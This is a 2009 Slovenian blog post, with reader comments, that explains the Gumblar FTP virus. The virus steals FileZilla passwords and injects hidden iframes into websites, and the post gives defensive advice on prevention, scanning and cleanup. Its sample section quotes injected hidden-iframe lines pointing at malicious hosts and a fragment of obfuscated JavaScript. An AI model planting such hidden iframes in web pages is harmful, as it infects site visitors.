T&R splet blog o spletnih storitvah. Razgaljamo tehnologijo!

reference spletnih strani
« Počasnost – optimizacija – pohitritev Firefox brskalnika
PHP knjižice za delo s slikami – WideImage | Thumbnailer »
11th August

FTP virus – iframe vdor – škodljiva koda – Gumblar FTP virus – fileZilla – Troj/JsRedir-R

Včeraj sem spet imel opraviti s prijateljem, ki je dobil virus, ki prebere vsa gesla iz FTP programa, nato pa virus preko skripte v index.html, index.php vnese iframe na koncu ali na začetku skripte, takoj za body značko. Ko virus vnose iframe ali dodatno javascript kodo, obiskovalci s Firefox ter Chrome dobijo opozorilo, da stran vsebuje elemente, ki lahko škoduje vašemu računalniku. V primeru, da obiskovalec vseeno obišče vašo spletno stran lahko dobi enak virus, ki nato nadaljuje pregledovanje FTP gesel še na njegovem računalniku. S tem se velik del obiskovalcev preusmeri drugam (promet upade), dodatno pa vas lahko Google za nekaj časa vrže iz Google search indexa, kar dodatno zmanjša promet na vaši spletni strani oz. spletni trgovini.

Kdo je ranljiv:

Vsi FTP programi, ki gesla shranjujejo v plain text obliki. Med temi je najbolj znan fileZilla.

Kako preprečiti:

V FTP programih označite, da se gesla NE shranjujejo. Dodatno lahko uporabljate SFTP protokol, kjer se podatki in gesla šifrirano pošiljajo preko omrežja. Dodatno spremenite vsa gesla za FTP/control penal in tako preprečite nadaljnje vdore preko vašega FTP računa.

Kateri antivirusnik?:

Najprej uporabite CCleaner za čiščenje nesnage iz temp direktorija, nato preiščite računalnik z Malwarebytes. Dodatno vam priporočam še pregled z NOD32 (trial), v primeru, da se res želite prepričati pa uporabite še Avast boot scan ter AVG enkratni pregled.

Kako popraviti:

Na internetmojster forumu je bl4ckb1rd objavil kodo, kako dobiti seznam datotek, ki so okužene. Dodaten način je, da uporabite Zend Search in Files ali Netbeans, Search files. Ko imate enkrat seznam datotek morate ročno počistiti zadevo, torej odstraniti javascript ali iframe, nato pa popravljene datoteke na novo naložiti na strežnik, če ste spremembe delali lokalno.

Primeri virusa:


PLAIN TEXT
HTML:
  1. <strong>Iframe:</strong> src="http://viewhit.biz" width=1 height=1 style="visibility:hidden"
  2. <strong>Iframe:</strong> src="http://a3h.pl:8080/ts/in.cgi?pepsi77" width=125 height=125 style="visibility:hidden"
  3. <strong>Javascript:</strong> script function c102916999516l49464ef52d352(l49464ef52db24){ function l49464ef52e2f0(){return 16;} return

Dodatne informacije:

Upam, da bo komu vodič prišel v pomoč. V primeru, da še niste imeli opravka s virusom ter uporabljate fileZilla ali podoben FTP program, vam vseeno priporočam spremembo gesla ter pregled računalnika z zgoraj omenjenimi programi za odstranitev virusov.

Deli s skupnostjo:

  • Print
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google Bookmarks

Podobni članki:

  1. PHP – ftp funkcionalnost (ftp funkcije)
  2. Nova koda za dodajanje YouTube filmov na internetno stran
  3. Microsoft Security Essentials – brezplačni antivirusnik – virusi, trojanci, spyware

Roky || Tuesday, August 11th, 2009 ob 6:58 am || Splet || RSS 2.0 | Dodaj komentar || Trackback


3x komentirano na “FTP virus – iframe vdor – škodljiva koda – Gumblar FTP virus – fileZilla – Troj/JsRedir-R”

  1. KMX je napisal:
    August 11th, 2009 ob 7:23 am

    Tole je kr zanimiva zadeva, sam zanima me al je bla prijateljica al prijatelj?

    "Včeraj sem spet imel opraviti s prijateljem, ki je dobila virus" :D

    Uživej!

  2. Roky je napisal:
    August 11th, 2009 ob 7:25 am

    Dobil virus:) Tnx.

    Zanimva ja, ko imaš enkrat 1000 fajlov za popravit:P

  3. Microsoft Security Essentials – brezplačni antivirusnik – virus, trojanci, spyware | .: TRSplet - internetne storitve :. je napisal:
    October 1st, 2009 ob 7:23 am

    [...] Zakaj neki na Web blog pišemo o protivirusnem programu se sprašujete? Ker je pred kratkim vsaj 40% vseh web developerjev prizadel Gumblar oz. FTP virus o katerem smo tudi že pisali. [...]

Dodaj komentar